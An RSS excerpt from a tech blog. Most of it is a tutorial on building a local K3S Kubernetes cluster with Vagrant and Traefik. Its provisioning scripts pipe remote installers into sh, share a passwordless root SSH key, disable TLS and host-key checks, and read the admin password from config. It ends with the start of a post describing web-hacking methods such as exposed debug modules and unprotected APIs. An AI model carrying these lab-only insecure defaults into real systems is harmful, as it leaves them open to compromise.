on smaller configurations. 
It even runs without any problem on a Raspberry Pi.</p><p>In our case, it will allow us to get around the limitation of K8S, which requires at least 2 GB of RAM to run.</p><p>Since we are going to create several servers, the idea is to keep the required memory as low as possible.</p><p>In this post we will use the multi-master mode, which is very recent. If you want more information on this subject, I invite you to read the excellent article by <a href="https://blog.wescale.fr/2020/01/09/k3s-le-kubernetes-allege-hautement-disponible/?ref=en.tferdinand.net">my colleagues at WeScale [French Link]</a>.</p><h2 id="traefik-again-and-again-the-load-balancer">Traefik: Again and again the load balancer</h2><p>In order to reproduce the behavior of a classic cluster as closely as possible, we will also deploy a Traefik server as a front end, in front of Kubernetes, which will balance the load between the 3 master nodes.</p><p>The choice of Traefik is arbitrary; any reverse proxy will do.</p><p>Once again, the goal is to have something light, hence the use of Traefik, which is very resource-efficient.</p><h2 id="target-deployment-overview">Target deployment overview</h2><p>We are going to have 3 distinct layers in our deployment:</p><ul><li>front_lb: a machine using Traefik to manage the incoming traffic to Kubernetes</li><li>kubemaster#: the 3 Kubernetes &quot;master&quot; servers</li><li>kubenode#: the 3 Kubernetes servers serving as execution nodes for the pods</li></ul><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/09/image-8.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="771" height="561"></figure><h2 id="prerequisites-and-information">Prerequisites and information</h2><p>The deployment I will describe below has been tested and validated with the following configuration:</p><!--kg-card-begin: html--><table>
<tr>
    <td>
        Operating System
    </td>
    <td>
        Parrot OS 4.10
    </td>
</tr>
<tr>
    <td>
        Total memory
    </td>
    <td>
        16 GB
    </td>
</tr>
<tr>
    <td>
        CPU
    </td>
    <td>
        Intel i7 10510u
    </td>
</tr>
<tr>
    <td>
        Virtualization
    </td>
    <td>
        VirtualBox 6.1.12
    </td>
</tr>
<tr>
    <td>
        Vagrant version
    </td>
    <td>
        2.2.9
    </td>
</tr>
</table>    <!--kg-card-end: html--><p>None of this information is normally hard-coded in the deployment, but some settings may need to be adjusted depending on your host system.</p><p>Also, in order to allow my nodes to communicate with each other over SSH, I created an RSA key that is deployed automatically.</p><p>This key lives in the ./.ssh directory, and you must create it yourself before starting the deployment via Vagrant.</p><p>You can do it easily with the following command:</p><!--kg-card-begin: html--><pre class="language-bash"><code>ssh-keygen -f ./.ssh/id_rsa
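# Tip: to skip the interactive prompt, the same key can be generated
# non-interactively with an explicit empty passphrase:
# mkdir -p ./.ssh
# ssh-keygen -f ./.ssh/id_rsa -N "" -q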
</code></pre><!--kg-card-end: html--><p>When prompted for a passphrase, leave it empty, because we will use this key for scripted connections between our nodes.</p><h2 id="it-s-time-to-get-our-hands-dirty-">It&apos;s time to get our hands dirty!</h2><p>All right, enough talk, when do we deploy?</p><p>Not right away; first of all, let&apos;s look at what we&apos;re going to deploy.</p><h3 id="the-basic-os">The basic OS</h3><p>On our machines, we will first have to deploy an operating system.</p><p>Vagrant uses a system of &quot;boxes&quot;, which are actually images prepared for Vagrant. It is possible to get the list of boxes on <a href="https://app.vagrantup.com/boxes/search?ref=en.tferdinand.net">the official website</a>.</p><p>In our case, we will use an Ubuntu 18.04 box.</p><p>I&apos;m not a fan of Ubuntu as a server, I prefer a good old Debian or CentOS, but Ubuntu is the system <a href="https://rancher.com/docs/k3s/latest/en/installation/installation-requirements/?ref=en.tferdinand.net">officially supported by K3S</a>.</p><p>For Traefik, I&apos;ll use the same box, just because I&apos;m lazy. 
In itself, nothing prevents me from using another base box.</p><h3 id="masters">Masters</h3><p>First, we have the Kubernetes &quot;master&quot; servers.</p><p>For these, we have two distinct cases.</p><p>The first server must be launched with the &quot;--cluster-init&quot; parameter to indicate that we want to initiate a K3S cluster.</p><p>Then, the other nodes will have to connect to the first node using the secret it generated.</p><p>To simplify the exchange of the secret, the second and third nodes will download the file containing the secret via SCP (hence the creation of the SSH key).</p><p>In addition, we will explicitly tell K3S the IP address of each server: the VM has several network cards, so K3S would otherwise pick the wrong IP.</p><p>So here is the associated Vagrant configuration block:</p><!--kg-card-begin: html--><pre class="language-hcl line-numbers"><code>MASTER_COUNT = 3
IMAGE = &quot;ubuntu/bionic64&quot;

...

Vagrant.configure(&quot;2&quot;) do |config|

  (1..MASTER_COUNT).each do |i|
    config.vm.define &quot;kubemaster#{i}&quot; do |kubemasters|
      kubemasters.vm.box = IMAGE
      kubemasters.vm.hostname = &quot;kubemaster#{i}&quot;
      kubemasters.vm.network  :private_network, ip: &quot;10.0.0.#{i+10}&quot;
      kubemasters.vm.provision &quot;file&quot;, source: &quot;./.ssh/id_rsa.pub&quot;, destination: &quot;/tmp/id_rsa.pub&quot;
      kubemasters.vm.provision &quot;file&quot;, source: &quot;./.ssh/id_rsa&quot;, destination: &quot;/tmp/id_rsa&quot;
      kubemasters.vm.provision &quot;shell&quot;, privileged: true,  path: &quot;scripts/master_install.sh&quot;
    end
  end

...

end
</code></pre><!--kg-card-end: html--><ul><li>Line 8: Vagrant loop structure</li><li>Line 11: We name each machine with a different host name.</li><li>Line 12: Each machine will have a fixed IP allocated (from 10.0.0.11 to 10.0.0.13)</li><li>Line 13/14: We push our SSH key which will be deployed by the script indicated in line 15</li></ul><p>As you can see, the description of the Vagrant side is quite basic.</p><p>Now, let&apos;s see the second side of this deployment: the provisioning shell script.</p><!--kg-card-begin: html--><pre class="language-bash line-numbers"><code>#!/bin/sh

# Deploy keys to allow all nodes to connect to each other as root
mv /tmp/id_rsa*  /root/.ssh/

chmod 400 /root/.ssh/id_rsa*
chown root:root  /root/.ssh/id_rsa*

cat /root/.ssh/id_rsa.pub &gt;&gt; /root/.ssh/authorized_keys
chmod 400 /root/.ssh/authorized_keys
chown root:root /root/.ssh/authorized_keys

# Add current node to /etc/hosts
echo &quot;127.0.1.1 $(hostname)&quot; &gt;&gt; /etc/hosts

# Get current IP address to launch k3s
current_ip=$(/sbin/ip -o -4 addr list enp0s8 | awk &apos;{print $4}&apos; | cut -d/ -f1)

# If we are on the first node, launch k3s with cluster-init, else join the existing cluster
if [ $(hostname) = &quot;kubemaster1&quot; ]
then
    curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC=&quot;server --cluster-init --tls-san $(hostname) --bind-address=${current_ip} --advertise-address=${current_ip} --node-ip=${current_ip} --no-deploy=traefik&quot; sh -
else
    echo &quot;10.0.0.11  kubemaster1&quot; &gt;&gt; /etc/hosts
    scp -o StrictHostKeyChecking=no root@kubemaster1:/var/lib/rancher/k3s/server/token /tmp/token
    curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC=&quot;server --server https://kubemaster1:6443 --token-file /tmp/token --tls-san $(hostname) --bind-address=${current_ip} --advertise-address=${current_ip} --node-ip=${current_ip} --no-deploy=traefik&quot; sh -
fi

# Wait for the node to be ready, then taint it so pods are not scheduled on it
sleep 15
kubectl taint --overwrite node $(hostname) node-role.kubernetes.io/master=true:NoSchedule
</code></pre><!--kg-card-end: html--><p>Once again, let&apos;s break this script down:</p><ul><li>Lines 4 to 11: We deploy our SSH key and add it to the authorized keys.</li><li>Lines 19 to 27: If we are on the node &quot;kubemaster1&quot;, we launch a cluster-init, otherwise we join the existing cluster.</li><li>Lines 30 and 31: We wait 15 seconds for the node to be functional, then we &quot;taint&quot; it to indicate that the node should not execute pods. In fact, by default, since K3S is designed to work on small systems, the master runs in standalone mode and can also execute pods.</li></ul><p>Note also that I disable the installation of Traefik: since our nodes are masters, they are not supposed to run an Ingress Controller.</p><h3 id="execution-nodes">Execution nodes</h3><p>Similarly, let&apos;s look at the contents of the VagrantFile for our execution nodes.</p><!--kg-card-begin: html--><pre class="language-hcl line-numbers"><code>MASTER_COUNT = 3
IMAGE = &quot;ubuntu/bionic64&quot;

...

Vagrant.configure(&quot;2&quot;) do |config|

...

  (1..NODE_COUNT).each do |i|
    config.vm.define &quot;kubenode#{i}&quot; do |kubenodes|
      kubenodes.vm.box = IMAGE
      kubenodes.vm.hostname = &quot;kubenode#{i}&quot;
      kubenodes.vm.network  :private_network, ip: &quot;10.0.0.#{i+20}&quot;
      kubenodes.vm.provision &quot;file&quot;, source: &quot;./.ssh/id_rsa.pub&quot;, destination: &quot;/tmp/id_rsa.pub&quot;
      kubenodes.vm.provision &quot;file&quot;, source: &quot;./.ssh/id_rsa&quot;, destination: &quot;/tmp/id_rsa&quot;
      kubenodes.vm.provision &quot;shell&quot;, privileged: true,  path: &quot;scripts/node_install.sh&quot;
    end
  end

...

end
</code></pre><!--kg-card-end: html--><p>As you can see, the content is pretty much the same as for the masters.</p><p>The only differences are:</p><ul><li>The IP range: this time from 10.0.0.21 to 10.0.0.23</li><li>The script executed for provisioning</li></ul><p>Let&apos;s take a look at the provisioning script:</p><!--kg-card-begin: html--><pre class="language-bash line-numbers"><code>#!/bin/sh

# Deploy keys to allow all nodes to connect to each other as root
mv /tmp/id_rsa*  /root/.ssh/

chmod 400 /root/.ssh/id_rsa*
chown root:root  /root/.ssh/id_rsa*

cat /root/.ssh/id_rsa.pub &gt;&gt; /root/.ssh/authorized_keys
chmod 400 /root/.ssh/authorized_keys
chown root:root /root/.ssh/authorized_keys

# Add current node to /etc/hosts
echo &quot;127.0.1.1 $(hostname)&quot; &gt;&gt; /etc/hosts

# Add kubemaster1 to /etc/hosts
echo &quot;10.0.0.11  kubemaster1&quot; &gt;&gt; /etc/hosts

# Get current IP address to launch k3s
current_ip=$(/sbin/ip -o -4 addr list enp0s8 | awk &apos;{print $4}&apos; | cut -d/ -f1)
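# Optional guard (assumption: your box also uses enp0s8): if the VM names the
# interface differently (e.g. eth1), current_ip will be empty and k3s would
# advertise a wrong address - warn early in that case
if [ -z "${current_ip}" ]; then echo "WARNING: no IPv4 address found on enp0s8"; fi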

# Launch k3s as agent
scp -o StrictHostKeyChecking=no root@kubemaster1:/var/lib/rancher/k3s/server/token /tmp/token
curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC=&quot;agent --server https://kubemaster1:6443 --token-file /tmp/token --node-ip=${current_ip}&quot; sh -
</code></pre><!--kg-card-end: html--><p>This time we have a much simpler script!</p><p>The first part again consists of deploying our SSH keys.</p><p>Then the last line launches K3S in &quot;agent&quot; mode, telling it to connect to the kubemaster1 node (I chose this node arbitrarily; any of the 3 masters would have done).</p><h3 id="load-balancer-frontend-traefik">Load balancer frontend: Traefik</h3><p>Finally, we deploy our front load balancer.</p><p>This installation is very basic: since we have no production constraints, the goal is not to be as secure as a production environment, but simply to have a load balancer that reproduces the normal behavior of a Kubernetes cluster.</p><p>On the Vagrant side, we are still very basic:</p><!--kg-card-begin: html--><pre class="language-hcl line-numbers"><code>MASTER_COUNT = 3
IMAGE = &quot;ubuntu/bionic64&quot;

...

Vagrant.configure(&quot;2&quot;) do |config|

...

  config.vm.define &quot;front_lb&quot; do |traefik|
      traefik.vm.box = IMAGE
      traefik.vm.hostname = &quot;traefik&quot;
      traefik.vm.network  :private_network, ip: &quot;10.0.0.30&quot;   
      traefik.vm.provision &quot;file&quot;, source: &quot;./scripts/traefik/dynamic_conf.toml&quot;, destination: &quot;/tmp/traefikconf/dynamic_conf.toml&quot;
      traefik.vm.provision &quot;file&quot;, source: &quot;./scripts/traefik/static_conf.toml&quot;, destination: &quot;/tmp/traefikconf/static_conf.toml&quot;
      traefik.vm.provision &quot;shell&quot;, privileged: true,  path: &quot;scripts/lb_install.sh&quot;
      traefik.vm.network &quot;forwarded_port&quot;, guest: 6443, host: 6443
  end
end
</code></pre><!--kg-card-end: html--><p>This time there is no SSH key; instead, we push the Traefik configuration that I will describe below.</p><p>Then, we run the installation. In addition, we map port 6443 of the host (my machine) to port 6443 of the virtual machine. This will allow me to run kubectl commands from my host through Traefik.</p><p>For Traefik, we have two configuration files:</p><ul><li>The static configuration: the basic configuration of Traefik; this is where we indicate the listening port, for example</li><li>The dynamic configuration: the information that Traefik can pick up on the fly, including the configuration of the endpoints</li></ul><p>Let&apos;s see our configuration.</p><p>Static configuration:</p><!--kg-card-begin: html--><pre class="language-toml line-numbers"><code>[entryPoints]
  [entryPoints.websecure]
    address = &quot;:6443&quot;
    [entryPoints.websecure.http.tls]
      [[entryPoints.websecure.http.tls.domains]]
        main = &quot;10.0.0.30&quot;

[providers.file]
  directory = &quot;/tmp/traefikconf/&quot;

[serversTransport]
  insecureSkipVerify = true
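
# Optional (assumption, not used in this setup): for local debugging, Traefik's
# dashboard can also be exposed by declaring an insecure API in this file:
# [api]
#   dashboard = true
#   insecure = true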
</code></pre><!--kg-card-end: html--><p>So we can see:</p><ul><li>I listen in HTTPS on 6443 (the default Kubernetes API port)</li><li>I then indicate in which directory my dynamic configuration is located</li><li>I disable certificate verification, because my K3S servers use a self-signed certificate by default</li></ul><p>Next comes the dynamic configuration, where I define my endpoints. Note that Traefik picks up any modification of this file instantly.</p><!--kg-card-begin: html--><pre class="language-toml line-numbers"><code>[http]

  [http.routers]
    [http.routers.routerTest]
      service = &quot;k3s&quot;
      rule = &quot;Host(`10.0.0.30`)&quot;

  [http.services]
    [http.services.k3s]
      [http.services.k3s.loadBalancer]
        [[http.services.k3s.loadBalancer.servers]]
          url = &quot;https://10.0.0.11:6443&quot;
        [[http.services.k3s.loadBalancer.servers]]
          url = &quot;https://10.0.0.12:6443&quot;
        [[http.services.k3s.loadBalancer.servers]]
          url = &quot;https://10.0.0.13:6443&quot;
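
# Optional (assumption): Traefik can also actively health-check each master,
# removing a node from rotation when its API server stops answering, e.g.:
# [http.services.k3s.loadBalancer.healthCheck]
#   path = "/healthz"
#   interval = "10s"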
</code></pre><!--kg-card-end: html--><p>Nothing original here either. First, I define a Traefik service named k3s, to which I send any request arriving with the host &quot;10.0.0.30&quot; (the IP address I set in Vagrant).</p><p>Then I define load balancing across the 3 Kubernetes masters. Traefik&apos;s default behavior is &quot;round robin&quot; mode, which means that it sends requests to each node in turn, regardless of load.</p><p>Finally, let&apos;s have a look at the installation shell script:</p><!--kg-card-begin: html--><pre class="language-bash line-numbers"><code>#!/bin/sh
# Download and deploy Traefik as a front load balancer
curl https://github.com/containous/traefik/releases/download/v2.2.11/traefik_v2.2.11_linux_amd64.tar.gz -o /tmp/traefik.tar.gz -L
cd /tmp/
tar xvfz ./traefik.tar.gz
nohup ./traefik --configFile=/tmp/traefikconf/static_conf.toml &amp;&gt; /dev/null&amp;
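# Optional sanity check: give Traefik a moment to start, then confirm the
# process is alive (warns instead of failing the provisioner)
sleep 2
pgrep -f traefik || echo "WARNING: Traefik does not seem to be running"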
</code></pre><!--kg-card-end: html--><p>This is the simplest of the three scripts. As you can see, I directly download the Traefik binary (version 2.2.11), because Traefik is also a standalone binary written in Go.</p><p>Then, I launch Traefik by detaching it from the terminal and simply telling it where its static configuration file is.</p><h2 id="it-s-time-to-launch-all-this-">It&apos;s time to launch all this!</h2><p>You can find all the code used on GitHub:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/teddy-ferdinand/vagrant-k3s-cluster?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">teddy-ferdinand/vagrant-k3s-cluster</div><div class="kg-bookmark-description">D&#xE9;ploiement d&#x2019;une infrastructure K3S avec Vagrant. Contribute to teddy-ferdinand/vagrant-k3s-cluster development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.githubassets.com/favicons/favicon.svg" alt="Create a local Kubernetes cluster with Vagrant"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">teddy-ferdinand</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://avatars0.githubusercontent.com/u/49089780?s=400&amp;v=4" alt="Create a local Kubernetes cluster with Vagrant"></div></a></figure><h3 id="install-vagrant">Install Vagrant</h3><p>First we need to install Vagrant.</p><p>Here we have several solutions available:</p><ul><li>Installation via the package manager: often the simplest solution under Linux. Note that not all distributions package Vagrant, and the packaged version can sometimes lag (far) behind the official site. For my part, this is the installation I did.</li><li>Standalone binary: Vagrant is a standalone binary written in Go, <a href="https://www.vagrantup.com/downloads?ref=en.tferdinand.net">available on the official website</a>; you can also install it this way.</li></ul><p>These two installations won&apos;t change anything afterwards, so choose the one that suits you best.</p><h3 id="launch-deployment">Launch deployment</h3><p>Once Vagrant is installed, go to the root directory, where our VagrantFile is located. We should have a structure similar to this one:</p><figure class="kg-card kg-image-card"><img src="https://tferdinand.net/content/images/2020/09/image-2.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="367" height="206"></figure><p>We can now launch the deployment with a simple</p><!--kg-card-begin: html--><pre class="language-bash"><code>vagrant up
</code></pre><!--kg-card-end: html--><p>You should normally see the deployment begin, with the download of the Ubuntu box.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/09/image-3.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="991" height="307"></figure><p>From there, the full deployment will take about 10 minutes.</p><h3 id="connect-to-our-cluster">Connect to our cluster</h3><p>Once the deployment is complete, Vagrant returns control of your terminal.</p><p>All we have to do now is configure the Kubernetes client on our workstation.</p><p>I included a little script that downloads kubectl and configures it to connect to our cluster, without touching any configuration already present on the host.</p><p>Here is its content:</p><!--kg-card-begin: html--><pre class="language-bash line-numbers"><code>#!/bin/sh

# Get kubectl
curl -L https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl -o /tmp/kubectlvagrant
chmod +x /tmp/kubectlvagrant
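
# Optional sanity check (added example, not in the original script):
# confirm the downloaded client binary actually runs
/tmp/kubectlvagrant version --client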

# Get password from master config file
PASSWORD=$(vagrant ssh kubemaster1 -c &quot;sudo grep password /etc/rancher/k3s/k3s.yaml&quot; | awk -F&apos;:&apos; &apos;{print $2}&apos; | sed &apos;s/ //g&apos;)
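
# Guard (added example, not in the original script): stop early if the
# password could not be read, e.g. if the kubemaster1 VM is not up yet
if [ -z &quot;${PASSWORD}&quot; ]; then
  echo &quot;Could not read the k3s admin password from kubemaster1&quot;
  return 1
fi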

#Create kubectl config
cat &lt;&lt; EOF &gt; /tmp/kubectlvagrantconfig.yml
apiVersion: v1
clusters:
- cluster:
    server: https://10.0.0.30:6443
    insecure-skip-tls-verify: true
  name: default
contexts:
- context:
    cluster: default
    user: default
  name: default
current-context: default
kind: Config
preferences: {}
users:
- name: default
  user:
    password: ${PASSWORD}
    username: admin
EOF

# Create temp vars to use kubectl with vagrant
export KUBECONFIG=/tmp/kubectlvagrantconfig.yml
alias kubectl=&quot;/tmp/kubectlvagrant&quot;
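
# Optional check (added example, hypothetical): confirm the cluster API answers
# /tmp/kubectlvagrant --kubeconfig /tmp/kubectlvagrantconfig.yml cluster-info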
</code></pre><!--kg-card-end: html--><p>As you can see, this script will:</p><ul><li>Download the kubectl client to /tmp/kubectlvagrant and make it executable.</li><li>Retrieve the Kubernetes admin login password from the master.</li><li>Insert this password into a kubeconfig template. Note the &quot;insecure-skip-tls-verify&quot; parameter, which tells kubectl to ignore the certificate, because once again we have a certificate self-signed by Traefik; the backend is my virtual machine running Traefik.</li><li>Finally, create an environment variable telling kubectl where to find its configuration, and an alias pointing kubectl to the binary we downloaded.</li></ul><p>To use this script, you just have to source it:</p><!--kg-card-begin: html--><pre class="language-bash"><code>source ./scripts/configure_kubectl.sh
</code></pre><!--kg-card-end: html--><p><strong>Be careful not to execute the script: the alias and the exported variable would not survive in your shell. You really have to source it.</strong></p><p>To go back to the initial state, just open a new terminal.</p><h3 id="it-s-time-to-test-our-cluster-">It&apos;s time to test our cluster!</h3><p>Once our script is sourced, let&apos;s try to see our nodes.</p><!--kg-card-begin: html--><pre class="language-bash"><code>kubectl get nodes -o wide
</code></pre><!--kg-card-end: html--><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/09/image-4.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="1257" height="254"></figure><p><em>This request may take a little longer than normal, since the cluster is receiving its first connection.</em></p><p>This is good news! We have our 3 masters and 3 worker nodes!</p><p>We&apos;re going to run a basic test, namely deploying 3 Nginx pods.</p><!--kg-card-begin: html--><pre class="language-bash"><code>kubectl apply -f https://raw.githubusercontent.com/kubernetes/website/master/content/fr/examples/controllers/nginx-deployment.yaml
</code></pre><!--kg-card-end: html--><p>Checking the deployed pods, we see 3 pods: 1 on each of our Kubernetes worker nodes.</p><!--kg-card-begin: html--><pre class="language-bash"><code>kubectl get pods -o wide
</code></pre><!--kg-card-end: html--><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/09/image-5.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="1264" height="146"></figure><p>After about 30 seconds, they will switch to &quot;Running&quot;.</p><p>As you can see, you can now use Kubernetes much as you would a production cluster.</p><p>Once you don&apos;t need the cluster anymore, you can destroy it with a simple</p><!--kg-card-begin: html--><pre class="language-bash"><code>vagrant destroy -f
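
# Alternative (added example): stop the VMs without deleting them
# vagrant halt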
</code></pre><!--kg-card-end: html--><p>After a minute, all your machines are now destroyed.</p><figure class="kg-card kg-image-card"><img src="https://tferdinand.net/content/images/2020/09/image-6.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="468" height="270"></figure><h2 id="to-conclude">To conclude</h2><p>As you can see, Vagrant makes it easy to create work environments, which makes application development or testing easier.</p><p>I also chose to use Traefik as a load balancer to show that there is also a Traefik binary. Indeed, we often talk about its Docker image, but it is above all a binary in GO.</p><p>Similarly, it is quite easy to create coherent infrastructures using Vagrant to reproduce a production environment.</p><p>The advantages are those I mentioned before:</p><ul><li>It&apos;s fast (10 minutes to create a complete cluster)</li><li>It doesn&apos;t cost anything, since the host is your machine.</li><li>It is easily transmitted, for example within a team.</li></ul><p>If you want to know more about Vagrant, I recommend the Xavki YouTube playlist which explores the tool well [French Link]:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.youtube.com/playlist?list=PLn6POgpklwWr3ADWfGJOC9jf8k6it3Ra8&amp;ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">TUTORIALS VAGRANT - EXEMPLES</div><div class="kg-bookmark-description">Quelques exemples utiles pour apprendre &#xE0; utiliser vagrant</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.youtube.com/s/desktop/4eb4dcc1/img/favicon_144.png" alt="Create a local Kubernetes cluster with Vagrant"><span class="kg-bookmark-author">YouTube</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://i.ytimg.com/vi/adR2EYm4gWQ/hqdefault.jpg?sqp=-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ==&amp;rs=AOn4CLCTFOAcA6oR3oeMDS8qKrBmTUifBw" alt="Create a 
local Kubernetes cluster with Vagrant"></div></a></figure><p>If you want to learn more about K3S, you can find content on the WeScale blog [French Link]:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://blog.wescale.fr/tag/k3s/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">k3s - Le blog des experts WeScale - DevOps, Cloud et passion</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://blog.wescale.fr/favicon.png" alt="Create a local Kubernetes cluster with Vagrant"><span class="kg-bookmark-author">Le blog des experts WeScale - DevOps, Cloud et passion</span><span class="kg-bookmark-publisher">Romain BOULANGER</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://blog.wescale.fr/content/images/2016/04/logo-wescale.png" alt="Create a local Kubernetes cluster with Vagrant"></div></a></figure><p>As always, feel free to comment! What do you think of Vagrant + K3S to have a local Kubernetes cluster?</p>]]></content:encoded></item><item><title><![CDATA[Being a hacker isn't like being in the movies!]]></title><description><![CDATA[<p>Hackers &#x2026; we often see them in movies and TV shows. These experts are able to hijack NSA satellites with a string and a nail clipper (#MacGyver)! (Cover image from the movie Die hard 4)</p><p>I decided today to tell you about hacking in &quot;real life&quot;. 
I consider</p>]]></description><link>https://en.tferdinand.net/being-a-hacker-isnt-like-being-in-the-movies/</link><guid isPermaLink="false">6337ff9a65fbc6000155a564</guid><category><![CDATA[Security]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Sun, 23 Aug 2020 18:19:46 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/08/OEcWr.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/08/OEcWr.jpg" alt="Being a hacker isn&apos;t like being in the movies!"><p>Hackers &#x2026; we often see them in movies and TV shows. These experts are able to hijack NSA satellites with a string and a nail clipper (#MacGyver)! (Cover image from the movie Die hard 4)</p><p>I decided today to tell you about hacking in &quot;real life&quot;. I consider myself to be a white hat (an ethical hacker) and I&#x2019;m going to tell you about the common methods a hacker uses. I will focus here on the simplest part: websites.</p><p>Spoiler alert: you may be disappointed, many methods are very simple.</p><!--kg-card-begin: html--><div style="background:red; color:white; padding:10px;"><h4>Important warning</h4><br>
The purpose of this post is not to promote hacking, but to demystify it and show a little bit what hacking is in real life. Don&apos;t get into hacking without knowing what you&apos;re doing and without taking the necessary precautions.<br>
Hacking is considered a misdemeanor or a crime depending on the country. For information, in France, &quot;Article 323-1 of the penal code punishes &quot;the fact of accessing or remaining fraudulently, in all or part of an automated processing system&quot;. The penalty incurred is 2 years imprisonment and a &#x20AC;30,000 fine. This can be increased to 3 years imprisonment and a 45000&#x20AC; fine when it results in &quot;either the deletion or modification of data contained in the system, or an alteration of the functioning of this system&quot;.
</div><!--kg-card-end: html--><h2 id="hack-what-for">Hack, what for?</h2><p>Before talking about methods and attack vectors, the right question is: why hack at all?</p><p>To answer this question, there are, from my point of view, two sides of the same coin to consider: the two types of hackers.</p><p>The white hat will try to find a flaw in order to report it. Yes, but why report it?</p><ul><li>By conviction: personally, I have already reported major security holes out of altruism; I&#x2019;m in favor of a safer web for everyone.</li><li>Because he takes part in bug bounties and will therefore receive a reward for reporting the flaw (subject to certain criteria, such as non-disclosure within x days).</li><li>For the challenge (I am also in this case): the challenge of breaking, of bypassing security. The pleasure of solving more or less complex puzzles&#x2026;</li></ul><p>The black hat, on the other hand, will try to take advantage of the flaw. There are several ways to do that:</p><ul><li>Extracting information and reselling it on the black market. For example, an enriched contact (email address, password, phone number, first and last name) can sell for a few cents; considering that many sites have thousands or even millions of contacts in their database, the total rises quickly.</li><li>Selling confidential information or trade secrets</li><li>Selling credit card/PayPal information, and so on&#x2026;</li><li>Making a site unavailable. 
Some offer DDoS &quot;as a service&quot;, allowing, for example, a competitor to be temporarily shut down to discredit it.</li><li>Requesting a ransom after encrypting all the data of a company or individual</li><li>Turning the machine into a zombie, used in a botnet or for phishing emails.</li></ul><p>The purpose of this article is not to be exhaustive, but to give you the main reasons.</p><h2 id="observe-to-break-better">Observe to break better</h2><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-2.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Matrix, mess and multiple monitors/keyboards</figcaption></figure><p>We often talk about incredible hacks, but we often forget to talk about more basic ones. I have had the opportunity to get past the security of some websites simply by being observant. For example, I recently managed to access very sensitive data on a website simply because of a display problem.</p><p>Indeed, one of the images had loaded badly, and I had the reflex of the good old CTRL+U (View Source)!</p><p>Imagine my surprise when I saw PHP errors whose HTML rendering had been hidden&#x2026; Then, digging into those errors, I discovered a debug module enabled on this production environment.</p><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-7.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" 
loading="lazy"><figcaption>Visible content (extract from the email sent to the security team and the company&#x2019;s DPO)</figcaption></figure><p>Via this debug module, I was able to trace back to the site&apos;s configuration files, which contained database connection strings, FTP server credentials and much other information, some of it confidential.</p><p>This is just an example, but be aware that there are many such cases. Observing the source code or the behavior of a site gives clues on how to tamper with its operation. It is also possible to observe the behavior of the application using the development tools (F12). This makes it possible to observe XHR-type calls, which often correspond to API calls; when the latter are not sufficiently protected, it is sometimes possible to have them display data from other clients or information that is supposed to be protected.</p><p>In one of my previous missions, I had put my finger on a security anomaly of this type: by modifying an API call, I was able to access all the information of all the clients registered in the database (we were talking about several million clients in this case). Fortunately, I had identified this bug on a pre-production environment, and it was fixed before going into production.</p><p>A lot of hacking is in fact done by opportunism, simply because a flaw was visible. Attacking the exposed surface remains the most common method!</p><h2 id="knowledge-is-power"><strong>Knowledge is power</strong></h2><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-3.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Mr. Robot, finally a show where hacking is realistic.</figcaption></figure><p>Observing is good, knowing is just as useful. 
Here, knowing means several things:</p><ul><li>Knowing the target: being able to identify the CMS used, for example, or the type of server that runs the site.</li><li>Knowing the common flaws</li><li>Knowing some common attack vectors: XHR, SQL injection, etc.</li></ul><p>Why is this important? As an illustration, if I want to try to brute-force a site, knowing whether I&apos;m on a WordPress- or Drupal-type CMS changes a lot: I&apos;m not going to attack both in the same way.</p><p>Moreover, I&apos;m going to look for the latest security patches in order to attack what they fix. In production, it is common for servers not to be updated as soon as a patch is released (except for big security patches announced by the publisher beforehand).</p><p>In the same way, knowing that a server is running an obsolete version of Apache HTTPD (for example, once again) tells me how I can compromise it to potentially take control of it.</p><p>In the world of hacking, keeping up with technology news is essential. You need to stay up to date with the latest major vulnerabilities, the latest methods, and the most common techniques.</p><p>For example, Amazon recently suffered an attack of several Tb per second. Everyone has been focusing on the 